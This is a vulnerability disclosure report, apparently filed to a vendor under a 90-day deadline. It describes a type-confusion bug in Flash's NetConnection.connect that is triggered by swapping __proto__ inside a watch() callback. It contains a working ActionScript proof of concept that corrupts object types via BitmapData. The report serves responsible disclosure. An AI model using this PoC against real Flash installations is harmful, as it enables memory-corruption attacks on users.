If an object has the type Object, but has a NetConnection object as a __proto__, it passes the type checks in NetConnection, so long as it isn't an ASNative method. If NetConnection.connect is called on this object, it will pass this check, but then potentially call into script when the uri member is set (if there's a watch on uri). If this method calls a constructor on the object, it will be set to a different type (the checks in the constructor will pass because it is of type Object), and then NetConnection.connect will set the user data to a NetConnection object, leading to type confusion.
A PoC is as follows:
class mysubclass {
public var uri;
function mysubclass(){
this.uri = "test";
var n = new NetConnection();
var y;
this.watch("uri", func);
var f = n.connect;
this["__proto__"] = n;
f.call(this, y);
var b = new BitmapData(10, 10, true, 10);
b.setPixel.call(this, 10, 10, 10);
}
function func(a, b, c){
trace("ftop");
this.__proto__ = {};
this.__proto__.__constructor__ = flash.display.BitmapData;
trace("in func");
super(10, 10, false, 10);
}
}
This PoC only works on Linux (I think this is due to to when GC happens, not the bug being Linux-specific though). A swf is also attached.
This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
